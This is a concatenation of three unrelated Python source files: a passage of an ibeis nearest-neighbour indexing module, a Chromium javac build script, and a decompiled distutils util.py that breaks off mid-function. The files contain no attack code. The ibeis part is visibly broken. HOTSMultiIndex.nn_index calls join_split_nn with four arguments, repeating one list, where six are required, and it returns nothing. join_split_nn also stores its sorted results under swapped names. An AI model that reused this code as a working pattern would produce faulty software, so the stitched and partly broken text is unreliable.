# returns something like: _daids((6)qbm6uaegu7gv!ut!)_FEAT(params)
daid_cfgstr = utool.hashstr_arr(aid_list, 'daids') # todo change to uuids
new_cfgstr = '_' + daid_cfgstr + feat_cfgstr
return new_cfgstr
def build_ibs_inverted_descriptor_index(ibs, aid_list):
"""
Aggregates descriptors of input annotations and returns inverted information
"""
try:
if len(aid_list) == 0:
msg = ('len(aid_list) == 0\n'
'Cannot build inverted index without features!')
raise AssertionError(msg)
desc_list = ibs.get_annot_desc(aid_list)
dx2_desc, dx2_aid, dx2_fx = _try_build_inverted_descriptor_index(aid_list, desc_list)
return dx2_desc, dx2_aid, dx2_fx
except Exception as ex:
intostr = ibs.get_infostr()
print(intostr)
utool.printex(ex, 'cannot build inverted index', key_list=list(locals().keys()))
raise
def _try_build_inverted_descriptor_index(aid_list, desc_list):
"""
Wrapper which performs logging and error checking
"""
if utool.NOT_QUIET:
print('[agg_desc] stacking descriptors from %d annotations' % len(aid_list))
try:
dx2_desc, dx2_aid, dx2_fx = _build_inverted_descriptor_index(aid_list, desc_list)
except MemoryError as ex:
utool.printex(ex, 'cannot build inverted index', '[!memerror]')
raise
if utool.NOT_QUIET:
print('[agg_desc] stacked %d descriptors from %d annotations'
% (len(dx2_desc), len(aid_list)))
return dx2_desc, dx2_aid, dx2_fx
def _build_inverted_descriptor_index(aid_list, desc_list):
"""
Stacks descriptors into a flat structure and returns inverse mapping from
flat database descriptor indexes (dx) to annotation ids (aid) and feature
indexes (fx). Feature indexes are w.r.t. annotation indexes.
Output:
dx2_desc - flat descriptor stack
dx2_aid - inverted index into annotations
dx2_fx - inverted index into features
# Example with 2D Descriptors
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> from ibeis.model.hots.hots_nn_index import _build_inverted_descriptor_index
>>> DESC_TYPE = np.uint8
>>> aid_list = [1, 2, 3, 4, 5]
>>> desc_list = [
... np.array([[0, 0], [0, 1]], dtype=DESC_TYPE),
... np.array([[5, 3], [2, 30], [1, 1]], dtype=DESC_TYPE),
... np.empty((0, 2), dtype=DESC_TYPE),
... np.array([[5, 3], [2, 30], [1, 1]], dtype=DESC_TYPE),
... np.array([[3, 3], [42, 42], [2, 6]], dtype=DESC_TYPE),
... ]
>>> dx2_desc, dx2_aid, dx2_fx = _build_inverted_descriptor_index(aid_list, desc_list)
>>> print(repr(dx2_desc.T))
array([[ 0, 0, 5, 2, 1, 5, 2, 1, 3, 42, 2],
[ 0, 1, 3, 30, 1, 3, 30, 1, 3, 42, 6]], dtype=uint8)
>>> print(repr(dx2_aid))
array([1, 1, 2, 2, 2, 4, 4, 4, 5, 5, 5])
>>> print(repr(dx2_fx))
array([0, 1, 0, 1, 2, 0, 1, 2, 0, 1, 2])
cdef:
list aid_list, desc_list
long nFeat, aid
iter aid_nFeat_iter, nFeat_iter, _ax2_aid, _ax2_fx
np.ndarray dx2_aid, dx2_fx, dx2_desc
"""
# Build inverted index of (aid, fx) pairs
aid_nFeat_iter = zip(aid_list, map(len, desc_list))
nFeat_iter = map(len, desc_list)
# generate aid inverted index for each feature in each annotation
_ax2_aid = ([aid] * nFeat for (aid, nFeat) in aid_nFeat_iter)
# Avi: please test the timing of the lines neighboring this statement.
#_ax2_aid = ([aid] * nFeat for (aid, nFeat) in aid_nFeat_iter)
# generate featx inverted index for each feature in each annotation
_ax2_fx = (range(nFeat) for nFeat in nFeat_iter)
# Flatten generators into the inverted index
#dx2_aid = np.array(list(chain.from_iterable(_ax2_aid)))
#dx2_fx = np.array(list(chain.from_iterable(_ax2_fx)))
dx2_aid = np.array(utool.flatten(_ax2_aid))
dx2_fx = np.array(utool.flatten(_ax2_fx))
# Stack descriptors into numpy array corresponding to inverted inexed
# This might throw a MemoryError
dx2_desc = np.vstack(desc_list)
return dx2_desc, dx2_aid, dx2_fx
#@utool.indent_func('[build_invx]')
def build_flann_inverted_index(ibs, aid_list, **kwargs):
"""
Build a inverted index (using FLANN)
"""
# Aggregate descriptors
dx2_desc, dx2_aid, dx2_fx = build_ibs_inverted_descriptor_index(ibs, aid_list)
# hash which annotations are input
indexed_cfgstr = get_indexed_cfgstr(ibs, aid_list)
flann_params = {'algorithm': 'kdtree', 'trees': 4}
flann_cachedir = ibs.get_flann_cachedir()
precomp_kwargs = {'cache_dir': flann_cachedir,
'cfgstr': indexed_cfgstr,
'flann_params': flann_params,
'use_cache': kwargs.get('use_cache', not NOCACHE_FLANN)}
# Build/Load the flann index
flann = nntool.flann_cache(dx2_desc, **precomp_kwargs)
return dx2_desc, dx2_aid, dx2_fx, flann
class HOTSIndex(object):
""" HotSpotter Nearest Neighbor (FLANN) Index Class
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> import ibeis
>>> ibs = ibeis.test_main(db='testdb1') #doctest: +ELLIPSIS
<BLANKLINE>
...
>>> daid_list = [1, 2, 3, 4]
>>> hsindex = HOTSIndex(ibs, daid_list) #doctest: +ELLIPSIS
[nnindex...
>>> print(hsindex) #doctest: +ELLIPSIS
<ibeis.model.hots.hots_nn_index.HOTSIndex object at ...>
"""
def __init__(hsindex, ibs, daid_list, **kwargs):
print('[nnindex] building HOTSIndex object')
dx2_desc, dx2_aid, dx2_fx, flann = build_flann_inverted_index(
ibs, daid_list, **kwargs)
# Agg Data
hsindex.dx2_aid = dx2_aid
hsindex.dx2_fx = dx2_fx
hsindex.dx2_data = dx2_desc
# Grab the keypoints names and image ids before query time
#hsindex.rx2_kpts = ibs.get_annot_kpts(daid_list)
#hsindex.rx2_gid = ibs.get_annot_gids(daid_list)
#hsindex.rx2_nid = ibs.get_annot_nids(daid_list)
hsindex.flann = flann
def __getstate__(hsindex):
""" This class it not pickleable """
#printDBG('get state HOTSIndex')
return None
#def __del__(hsindex):
# """ Ensure flann is propertly removed """
# printDBG('deleting HOTSIndex')
# if getattr(hsindex, 'flann', None) is not None:
# nn_selfindex.flann.delete_index()
# #del hsindex.flann
# hsindex.flann = None
def nn_index(hsindex, qfx2_desc, K, checks):
(qfx2_dx, qfx2_dist) = hsindex.flann.nn_index(qfx2_desc, K, checks=checks)
return (qfx2_dx, qfx2_dist)
def nn_index2(hsindex, qreq, qfx2_desc):
""" return nearest neighbors from this data_index's flann object """
flann = hsindex.flann
K = qreq.cfg.nn_cfg.K
Knorm = qreq.cfg.nn_cfg.Knorm
checks = qreq.cfg.nn_cfg.checks
(qfx2_dx, qfx2_dist) = flann.nn_index(qfx2_desc, K + Knorm, checks=checks)
qfx2_aid = hsindex.dx2_aid[qfx2_dx]
qfx2_fx = hsindex.dx2_fx[qfx2_dx]
return qfx2_aid, qfx2_fx, qfx2_dist, K, Knorm
class HOTSMultiIndex(object):
"""
Generalization of a HOTSNNIndex
>>> from ibeis.model.hots.hots_nn_index import * # NOQA
>>> import ibeis
>>> daid_list = [1, 2, 3, 4]
>>> num_forests = 8
>>> ibs = ibeis.test_main(db='testdb1') #doctest: +ELLIPSIS
<BLANKLINE>
...
>>> split_index = HOTSMultiIndex(ibs, daid_list, num_forests) #doctest: +ELLIPSIS
[nnsindex...
>>> print(split_index) #doctest: +ELLIPSIS
<ibeis.model.hots.hots_nn_index.HOTSMultiIndex object at ...>
"""
def __init__(split_index, ibs, daid_list, num_forests=8):
print('[nnsindex] make HOTSMultiIndex over %d annots' % (len(daid_list),))
# Remove unknown names
aid_list = daid_list
known_aids_list, unknown_aids = ibsfuncs.group_annots_by_known_names(ibs, aid_list)
num_bins = min(max(map(len, known_aids_list)), num_forests)
# Put one name per forest
forest_aids, overflow_aids = utool.sample_zip(
known_aids_list, num_bins, allow_overflow=True, per_bin=1)
forest_indexes = []
extra_indexes = []
for tx, aids in enumerate(forest_aids):
print('[nnsindex] building forest %d/%d with %d aids' %
(tx + 1, num_bins, len(aids)))
if len(aids) > 0:
hsindex = HOTSIndex(ibs, aids)
forest_indexes.append(hsindex)
if len(overflow_aids) > 0:
print('[nnsindex] building overflow forest')
overflow_index = HOTSIndex(ibs, overflow_aids)
extra_indexes.append(overflow_index)
if len(unknown_aids) > 0:
print('[nnsindex] building unknown forest')
unknown_index = HOTSIndex(ibs, unknown_aids)
extra_indexes.append(unknown_index)
#print('[nnsindex] building normalizer forest') # TODO
split_index.forest_indexes = forest_indexes
split_index.extra_indexes = extra_indexes
#split_index.overflow_index = overflow_index
#split_index.unknown_index = unknown_index
#@utool.classmember(HOTSMultiIndex)
def nn_index(split_index, qfx2_desc, num_neighbors):
qfx2_dx_list = []
qfx2_dist_list = []
qfx2_aid_list = []
qfx2_fx_list = []
qfx2_rankx_list = [] # ranks index
qfx2_treex_list = [] # tree index
for tx, hsindex in enumerate(split_index.forest_indexes):
flann = hsindex.flann
# Returns distances in ascending order for each query descriptor
(qfx2_dx, qfx2_dist) = flann.nn_index(qfx2_desc, num_neighbors, checks=1024)
qfx2_dx_list.append(qfx2_dx)
qfx2_dist_list.append(qfx2_dist)
qfx2_fx = hsindex.dx2_fx[qfx2_dx]
qfx2_aid = hsindex.dx2_aid[qfx2_dx]
qfx2_fx_list.append(qfx2_fx)
qfx2_aid_list.append(qfx2_aid)
qfx2_rankx_list.append(np.array([[rankx for rankx in range(qfx2_dx.shape[1])]] * len(qfx2_dx)))
qfx2_treex_list.append(np.array([[tx for rankx in range(qfx2_dx.shape[1])]] * len(qfx2_dx)))
# Combine results from each tree
(qfx2_dist_, qfx2_aid_, qfx2_fx_, qfx2_dx_, qfx2_rankx_, qfx2_treex_,) = \
join_split_nn(qfx2_dist_list, qfx2_dist_list, qfx2_rankx_list, qfx2_treex_list)
def join_split_nn(qfx2_dx_list, qfx2_dist_list, qfx2_aid_list, qfx2_fx_list, qfx2_rankx_list, qfx2_treex_list):
qfx2_dx = np.hstack(qfx2_dx_list)
qfx2_dist = np.hstack(qfx2_dist_list)
qfx2_rankx = np.hstack(qfx2_rankx_list)
qfx2_treex = np.hstack(qfx2_treex_list)
qfx2_aid = np.hstack(qfx2_aid_list)
qfx2_fx = np.hstack(qfx2_fx_list)
# Sort over all tree result distances
qfx2_sortx = qfx2_dist.argsort(axis=1)
# Apply sorting to concatenated results
qfx2_dist_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_dist)]
qfx2_aid_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_dx)]
qfx2_fx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_aid)]
qfx2_dx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_fx)]
qfx2_rankx_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_rankx)]
qfx2_treex_ = [row[sortx] for sortx, row in zip(qfx2_sortx, qfx2_treex)]
return (qfx2_dist_, qfx2_aid_, qfx2_fx_, qfx2_dx_, qfx2_rankx_, qfx2_treex_,)
#@utool.classmember(HOTSMultiIndex)
def split_index_daids(split_index):
for hsindex in split_index.forest_indexes:
pass
#if __name__ == '__main__':
# #python -m doctest -v ibeis/model/hots/hots_nn_index.py
# import doctest
# doctest.testmod()
|
|
#!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import shutil
import re
import sys
import textwrap
from util import build_utils
from util import md5_check
import jar
sys.path.append(build_utils.COLORAMA_ROOT)
import colorama
def ColorJavacOutput(output):
fileline_prefix = r'(?P<fileline>(?P<file>[-.\w/\\]+.java):(?P<line>[0-9]+):)'
warning_re = re.compile(
fileline_prefix + r'(?P<full_message> warning: (?P<message>.*))$')
error_re = re.compile(
fileline_prefix + r'(?P<full_message> (?P<message>.*))$')
marker_re = re.compile(r'\s*(?P<marker>\^)\s*$')
warning_color = ['full_message', colorama.Fore.YELLOW + colorama.Style.DIM]
error_color = ['full_message', colorama.Fore.MAGENTA + colorama.Style.BRIGHT]
marker_color = ['marker', colorama.Fore.BLUE + colorama.Style.BRIGHT]
def Colorize(line, regex, color):
match = regex.match(line)
start = match.start(color[0])
end = match.end(color[0])
return (line[:start]
+ color[1] + line[start:end]
+ colorama.Fore.RESET + colorama.Style.RESET_ALL
+ line[end:])
def ApplyColor(line):
if warning_re.match(line):
line = Colorize(line, warning_re, warning_color)
elif error_re.match(line):
line = Colorize(line, error_re, error_color)
elif marker_re.match(line):
line = Colorize(line, marker_re, marker_color)
return line
return '\n'.join(map(ApplyColor, output.split('\n')))
ERRORPRONE_OPTIONS = [
# These crash on lots of targets.
'-Xep:ParameterPackage:OFF',
'-Xep:OverridesGuiceInjectableMethod:OFF',
'-Xep:OverridesJavaxInjectableMethod:OFF',
]
def _FilterJavaFiles(paths, filters):
return [f for f in paths
if not filters or build_utils.MatchesGlob(f, filters)]
_MAX_MANIFEST_LINE_LEN = 72
def _ExtractClassFiles(jar_path, dest_dir, java_files):
"""Extracts all .class files not corresponding to |java_files|."""
# Two challenges exist here:
# 1. |java_files| have prefixes that are not represented in the the jar paths.
# 2. A single .java file results in multiple .class files when it contains
# nested classes.
# Here's an example:
# source path: ../../base/android/java/src/org/chromium/Foo.java
# jar paths: org/chromium/Foo.class, org/chromium/Foo$Inner.class
# To extract only .class files not related to the given .java files, we strip
# off ".class" and "$*.class" and use a substring match against java_files.
def extract_predicate(path):
if not path.endswith('.class'):
return False
path_without_suffix = re.sub(r'(?:\$|\.)[^/]+class$', '', path)
partial_java_path = path_without_suffix + '.java'
return not any(p.endswith(partial_java_path) for p in java_files)
build_utils.ExtractAll(jar_path, path=dest_dir, predicate=extract_predicate)
for path in build_utils.FindInDirectory(dest_dir, '*.class'):
shutil.copystat(jar_path, path)
def _ConvertToJMakeArgs(javac_cmd, pdb_path):
new_args = ['bin/jmake', '-pdb', pdb_path]
if javac_cmd[0] != 'javac':
new_args.extend(('-jcexec', new_args[0]))
if md5_check.PRINT_EXPLANATIONS:
new_args.append('-Xtiming')
do_not_prefix = ('-classpath', '-bootclasspath')
skip_next = False
for arg in javac_cmd[1:]:
if not skip_next and arg not in do_not_prefix:
arg = '-C' + arg
new_args.append(arg)
skip_next = arg in do_not_prefix
return new_args
def _FixTempPathsInIncrementalMetadata(pdb_path, temp_dir):
# The .pdb records absolute paths. Fix up paths within /tmp (srcjars).
if os.path.exists(pdb_path):
# Although its a binary file, search/replace still seems to work fine.
with open(pdb_path) as fileobj:
pdb_data = fileobj.read()
with open(pdb_path, 'w') as fileobj:
fileobj.write(re.sub(r'/tmp/[^/]*', temp_dir, pdb_data))
def _OnStaleMd5(changes, options, javac_cmd, java_files, classpath_inputs):
with build_utils.TempDir() as temp_dir:
srcjars = options.java_srcjars
# The .excluded.jar contains .class files excluded from the main jar.
# It is used for incremental compiles.
excluded_jar_path = options.jar_path.replace('.jar', '.excluded.jar')
classes_dir = os.path.join(temp_dir, 'classes')
os.makedirs(classes_dir)
changed_paths = None
# jmake can handle deleted files, but it's a rare case and it would
# complicate this script's logic.
if options.incremental and changes.AddedOrModifiedOnly():
changed_paths = set(changes.IterChangedPaths())
# Do a full compile if classpath has changed.
# jmake doesn't seem to do this on its own... Might be that ijars mess up
# its change-detection logic.
if any(p in changed_paths for p in classpath_inputs):
changed_paths = None
if options.incremental:
# jmake is a compiler wrapper that figures out the minimal set of .java
# files that need to be rebuilt given a set of .java files that have
# changed.
# jmake determines what files are stale based on timestamps between .java
# and .class files. Since we use .jars, .srcjars, and md5 checks,
# timestamp info isn't accurate for this purpose. Rather than use jmake's
# programatic interface (like we eventually should), we ensure that all
# .class files are newer than their .java files, and convey to jmake which
# sources are stale by having their .class files be missing entirely
# (by not extracting them).
pdb_path = options.jar_path + '.pdb'
javac_cmd = _ConvertToJMakeArgs(javac_cmd, pdb_path)
if srcjars:
_FixTempPathsInIncrementalMetadata(pdb_path, temp_dir)
if srcjars:
java_dir = os.path.join(temp_dir, 'java')
os.makedirs(java_dir)
for srcjar in options.java_srcjars:
if changed_paths:
changed_paths.update(os.path.join(java_dir, f)
for f in changes.IterChangedSubpaths(srcjar))
build_utils.ExtractAll(srcjar, path=java_dir, pattern='*.java')
jar_srcs = build_utils.FindInDirectory(java_dir, '*.java')
jar_srcs = _FilterJavaFiles(jar_srcs, options.javac_includes)
java_files.extend(jar_srcs)
if changed_paths:
# Set the mtime of all sources to 0 since we use the absense of .class
# files to tell jmake which files are stale.
for path in jar_srcs:
os.utime(path, (0, 0))
if java_files:
if changed_paths:
changed_java_files = [p for p in java_files if p in changed_paths]
if os.path.exists(options.jar_path):
_ExtractClassFiles(options.jar_path, classes_dir, changed_java_files)
if os.path.exists(excluded_jar_path):
_ExtractClassFiles(excluded_jar_path, classes_dir, changed_java_files)
# Add the extracted files to the classpath. This is required because
# when compiling only a subset of files, classes that haven't changed
# need to be findable.
classpath_idx = javac_cmd.index('-classpath')
javac_cmd[classpath_idx + 1] += ':' + classes_dir
# Can happen when a target goes from having no sources, to having sources.
# It's created by the call to build_utils.Touch() below.
if options.incremental:
if os.path.exists(pdb_path) and not os.path.getsize(pdb_path):
os.unlink(pdb_path)
# Don't include the output directory in the initial set of args since it
# being in a temp dir makes it unstable (breaks md5 stamping).
cmd = javac_cmd + ['-d', classes_dir] + java_files
# JMake prints out some diagnostic logs that we want to ignore.
# This assumes that all compiler output goes through stderr.
stdout_filter = lambda s: ''
if md5_check.PRINT_EXPLANATIONS:
stdout_filter = None
attempt_build = lambda: build_utils.CheckOutput(
cmd,
print_stdout=options.chromium_code,
stdout_filter=stdout_filter,
stderr_filter=ColorJavacOutput)
try:
attempt_build()
except build_utils.CalledProcessError as e:
# Work-around for a bug in jmake (http://crbug.com/551449).
if 'project database corrupted' not in e.output:
raise
print ('Applying work-around for jmake project database corrupted '
'(http://crbug.com/551449).')
os.unlink(pdb_path)
attempt_build()
elif options.incremental:
# Make sure output exists.
build_utils.Touch(pdb_path)
glob = options.jar_excluded_classes
inclusion_predicate = lambda f: not build_utils.MatchesGlob(f, glob)
exclusion_predicate = lambda f: not inclusion_predicate(f)
jar.JarDirectory(classes_dir,
options.jar_path,
predicate=inclusion_predicate)
jar.JarDirectory(classes_dir,
excluded_jar_path,
predicate=exclusion_predicate)
def _ParseOptions(argv):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option(
'--src-gendirs',
help='Directories containing generated java files.')
parser.add_option(
'--java-srcjars',
action='append',
default=[],
help='List of srcjars to include in compilation.')
parser.add_option(
'--bootclasspath',
action='append',
default=[],
help='Boot classpath for javac. If this is specified multiple times, '
'they will all be appended to construct the classpath.')
parser.add_option(
'--classpath',
action='append',
help='Classpath for javac. If this is specified multiple times, they '
'will all be appended to construct the classpath.')
parser.add_option(
'--incremental',
action='store_true',
help='Whether to re-use .class files rather than recompiling them '
'(when possible).')
parser.add_option(
'--javac-includes',
default='',
help='A list of file patterns. If provided, only java files that match'
'one of the patterns will be compiled.')
parser.add_option(
'--jar-excluded-classes',
default='',
help='List of .class file patterns to exclude from the jar.')
parser.add_option(
'--chromium-code',
type='int',
help='Whether code being compiled should be built with stricter '
'warnings for chromium code.')
parser.add_option(
'--use-errorprone-path',
help='Use the Errorprone compiler at this path.')
parser.add_option('--jar-path', help='Jar output path.')
parser.add_option('--stamp', help='Path to touch on success.')
options, args = parser.parse_args(argv)
build_utils.CheckOptions(options, parser, required=('jar_path',))
bootclasspath = []
for arg in options.bootclasspath:
bootclasspath += build_utils.ParseGypList(arg)
options.bootclasspath = bootclasspath
classpath = []
for arg in options.classpath:
classpath += build_utils.ParseGypList(arg)
options.classpath = classpath
java_srcjars = []
for arg in options.java_srcjars:
java_srcjars += build_utils.ParseGypList(arg)
options.java_srcjars = java_srcjars
if options.src_gendirs:
options.src_gendirs = build_utils.ParseGypList(options.src_gendirs)
options.javac_includes = build_utils.ParseGypList(options.javac_includes)
options.jar_excluded_classes = (
build_utils.ParseGypList(options.jar_excluded_classes))
return options, args
def main(argv):
colorama.init()
argv = build_utils.ExpandFileArgs(argv)
options, java_files = _ParseOptions(argv)
if options.src_gendirs:
java_files += build_utils.FindInDirectories(options.src_gendirs, '*.java')
java_files = _FilterJavaFiles(java_files, options.javac_includes)
javac_cmd = ['javac']
if options.use_errorprone_path:
javac_cmd = [options.use_errorprone_path] + ERRORPRONE_OPTIONS
javac_cmd.extend((
'-g',
# Chromium only allows UTF8 source files. Being explicit avoids
# javac pulling a default encoding from the user's environment.
'-encoding', 'UTF-8',
'-classpath', ':'.join(options.classpath),
# Prevent compiler from compiling .java files not listed as inputs.
# See: http://blog.ltgt.net/most-build-tools-misuse-javac/
'-sourcepath', ''
))
if options.bootclasspath:
javac_cmd.extend([
'-bootclasspath', ':'.join(options.bootclasspath),
'-source', '1.7',
'-target', '1.7',
])
if options.chromium_code:
javac_cmd.extend(['-Xlint:unchecked', '-Xlint:deprecation'])
else:
# XDignore.symbol.file makes javac compile against rt.jar instead of
# ct.sym. This means that using a java internal package/class will not
# trigger a compile warning or error.
javac_cmd.extend(['-XDignore.symbol.file'])
classpath_inputs = options.bootclasspath
# TODO(agrieve): Remove this .TOC heuristic once GYP is no more.
if options.classpath and not options.classpath[0].endswith('.interface.jar'):
for path in options.classpath:
if os.path.exists(path + '.TOC'):
classpath_inputs.append(path + '.TOC')
else:
classpath_inputs.append(path)
# Compute the list of paths that when changed, we need to rebuild.
input_paths = classpath_inputs + options.java_srcjars + java_files
output_paths = [
options.jar_path,
options.jar_path.replace('.jar', '.excluded.jar'),
]
if options.incremental:
output_paths.append(options.jar_path + '.pdb')
# An escape hatch to be able to check if incremental compiles are causing
# problems.
force = int(os.environ.get('DISABLE_INCREMENTAL_JAVAC', 0))
# List python deps in input_strings rather than input_paths since the contents
# of them does not change what gets written to the depsfile.
build_utils.CallAndWriteDepfileIfStale(
lambda changes: _OnStaleMd5(changes, options, javac_cmd, java_files,
classpath_inputs),
options,
input_paths=input_paths,
input_strings=javac_cmd,
output_paths=output_paths,
force=force,
pass_changes=True)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: util.py
"""distutils.util
Miscellaneous utility functions -- anything that doesn't fit into
one of the other *util.py modules.
"""
__revision__ = '$Id$'
import sys
import os
import string
import re
from distutils.errors import DistutilsPlatformError
from distutils.dep_util import newer
from distutils.spawn import spawn
from distutils import log
from distutils.errors import DistutilsByteCompileError
def get_platform():
"""Return a string that identifies the current platform. This is used
mainly to distinguish platform-specific build directories and
platform-specific built distributions. Typically includes the OS name
and version and the architecture (as supplied by 'os.uname()'),
although the exact information included depends on the OS; eg. for IRIX
the architecture isn't particularly important (IRIX only runs on SGI
hardware), but for Linux the kernel version isn't particularly
important.
Examples of returned values:
linux-i586
linux-alpha (?)
solaris-2.6-sun4u
irix-5.3
irix64-6.2
Windows will return one of:
win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc)
win-ia64 (64bit Windows on Itanium)
win32 (all others - specifically, sys.platform is returned)
For other non-POSIX platforms, currently just returns 'sys.platform'.
"""
if os.name == 'nt':
prefix = ' bit ('
i = string.find(sys.version, prefix)
if i == -1:
return sys.platform
j = string.find(sys.version, ')', i)
look = sys.version[i + len(prefix):j].lower()
if look == 'amd64':
return 'win-amd64'
if look == 'itanium':
return 'win-ia64'
return sys.platform
else:
if os.name != 'posix' or not hasattr(os, 'uname'):
return sys.platform
osname, host, release, version, machine = os.uname()
osname = string.lower(osname)
osname = string.replace(osname, '/', '')
machine = string.replace(machine, ' ', '_')
machine = string.replace(machine, '/', '-')
if osname[:5] == 'linux':
return '%s-%s' % (osname, machine)
if osname[:5] == 'sunos':
if release[0] >= '5':
osname = 'solaris'
release = '%d.%s' % (int(release[0]) - 3, release[2:])
else:
if osname[:4] == 'irix':
return '%s-%s' % (osname, release)
if osname[:3] == 'aix':
return '%s-%s.%s' % (osname, version, release)
if osname[:6] == 'cygwin':
osname = 'cygwin'
rel_re = re.compile('[\\d.]+')
m = rel_re.match(release)
if m:
release = m.group()
elif osname[:6] == 'darwin':
from distutils.sysconfig import get_config_vars
cfgvars = get_config_vars()
macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET')
macrelease = macver
try:
f = open('/System/Library/CoreServices/SystemVersion.plist')
except IOError:
pass
else:
try:
m = re.search('<key>ProductUserVisibleVersion</key>\\s*' + '<string>(.*?)</string>', f.read())
if m is not None:
macrelease = '.'.join(m.group(1).split('.')[:2])
finally:
f.close()
if not macver:
macver = macrelease
if macver:
from distutils.sysconfig import get_config_vars
release = macver
osname = 'macosx'
if macrelease + '.' >= '10.4.' and '-arch' in get_config_vars().get('CFLAGS', '').strip():
machine = 'fat'
cflags = get_config_vars().get('CFLAGS')
archs = re.findall('-arch\\s+(\\S+)', cflags)
archs = tuple(sorted(set(archs)))
if len(archs) == 1:
machine = archs[0]
elif archs == ('i386', 'ppc'):
machine = 'fat'
elif archs == ('i386', 'x86_64'):
machine = 'intel'
elif archs == ('i386', 'ppc', 'x86_64'):
machine = 'fat3'
elif archs == ('ppc64', 'x86_64'):
machine = 'fat64'
elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'):
machine = 'universal'
else:
raise ValueError("Don't know machine value for archs=%r" % (archs,))
elif machine == 'i386':
if sys.maxint >= 4294967296:
machine = 'x86_64'
elif machine in ('PowerPC', 'Power_Macintosh'):
machine = 'ppc'
if sys.maxint >= 4294967296:
machine = 'ppc64'
return '%s-%s-%s' % (osname, release, machine)
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem,
i.e. split it on '/' and put it back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError, "path '%s' cannot be absolute" % pathname
if pathname[-1] == '/':
raise ValueError, "path '%s' cannot end with '/'" % pathname
paths = string.split(pathname, '/')
while '.' in paths:
paths.remove('.')
if not paths:
return os.curdir
return os.path.join(*paths)
def change_root(new_root, pathname):
"""Return 'pathname' with 'new_root' prepended. If 'pathname' is
relative, this is equivalent to "os.path.join(new_root,pathname)".
Otherwise, it requires making 'pathname' relative and then joining the
two, which is tricky on DOS/Windows and Mac OS.
"""
if os.name == 'posix':
if not os.path.isabs(pathname):
return os.path.join(new_root, pathname)
else:
return os.path.join(new_root, pathname[1:])
else:
if os.name == 'nt':
drive, path = os.path.splitdrive(pathname)
if path[0] == '\\':
path = path[1:]
return os.path.join(new_root, path)
if os.name == 'os2':
drive, path = os.path.splitdrive(pathname)
if path[0] == os.sep:
path = path[1:]
return os.path.join(new_root, path)
raise DistutilsPlatformError, "nothing known about platform '%s'" % os.name
_environ_checked = 0
def check_environ():
"""Ensure that 'os.environ' has all the environment variables we
guarantee that users can use in config files, command-line options,
etc. Currently this includes:
HOME - user's home directory (Unix only)
PLAT - description of the current platform, including hardware
and OS (see 'get_platform()')
"""
global _environ_checked
if _environ_checked:
return
if os.name == 'posix' and 'HOME' not in os.environ:
import pwd
os.environ['HOME'] = pwd.getpwuid(os.getuid())[5]
if 'PLAT' not in os.environ:
os.environ['PLAT'] = get_platform()
_environ_checked = 1
def subst_vars(s, local_vars):
"""Perform shell/Perl-style variable substitution on 'string'. Every
occurrence of '$' followed by a name is considered a variable, and
variable is substituted by the value found in the 'local_vars'
dictionary, or in 'os.environ' if it's not in 'local_vars'.
'os.environ' is first checked/augmented to guarantee that it contains
certain values: see 'check_environ()'. Raise ValueError for any
variables not found in either 'local_vars' or 'os.environ'.
"""
check_environ()
def _subst(match, local_vars=local_vars):
var_name = match.group(1)
if var_name in local_vars:
return str(local_vars[var_name])
else:
return os.environ[var_name]
try:
return re.sub('\\$([a-zA-Z_][a-zA-Z_0-9]*)', _subst, s)
except KeyError as var:
raise ValueError, "invalid variable '$%s'" % var
def grok_environment_error(exc, prefix='error: '):
"""Generate a useful error message from an EnvironmentError (IOError or
OSError) exception object. Handles Python 1.5.1 and 1.5.2 styles, and
does what it can to deal with exception objects that don't have a
filename (which happens when the error is due to a two-file operation,
such as 'rename()' or 'link()'. Returns the error message as a string
prefixed with 'prefix'.
"""
if hasattr(exc, 'filename') and hasattr(exc, 'strerror'):
if exc.filename:
error = prefix + '%s: %s' % (exc.filename, exc.strerror)
else:
error = prefix + '%s' % exc.strerror
else:
error = prefix + str(exc[-1])
return error
_wordchars_re = _squote_re = _dquote_re = None
def _init_regex():
global _squote_re
global _wordchars_re
global _dquote_re
_wordchars_re = re.compile('[^\\\\\\\'\\"%s ]*' % string.whitespace)
_squote_re = re.compile("'(?:[^'\\\\]|\\\\.)*'")
_dquote_re = re.compile('"(?:[^"\\\\]|\\\\.)*"')
def split_quoted(s):
"""Split a string up according to Unix shell-like rules for quotes and
backslashes. In short: words are delimited by spaces, as long as those
spaces are not escaped by a backslash, or inside a quoted string.
Single and double quotes are equivalent, and the quote characters can
be backslash-escaped. The backslash is stripped from any two-character
escape sequence, leaving only the escaped character. The quote
characters are stripped from any quoted string. Returns a list of
words.
"""
if _wordchars_re is None:
_init_regex()
s = string.strip(s)
words = []
pos = 0
while s:
m = _wordchars_re.match(s, pos)
end = m.end()
if end == len(s):
words.append(s[:end])
break
if s[end] in string.whitespace:
words.append(s[:end])
s = string.lstrip(s[end:])
pos = 0
elif s[end] == '\\':
s = s[:end] + s[end + 1:]
pos = end + 1
else:
if s[end] == "'":
m = _squote_re.match(s, end)
elif s[end] == '"':
m = _dquote_re.match(s, end)
else:
raise RuntimeError, "this can't happen (bad char '%c')" % s[end]
if m is None:
raise ValueError, 'bad string (mismatched %s quotes?)' % s[end]
beg, end = m.span()
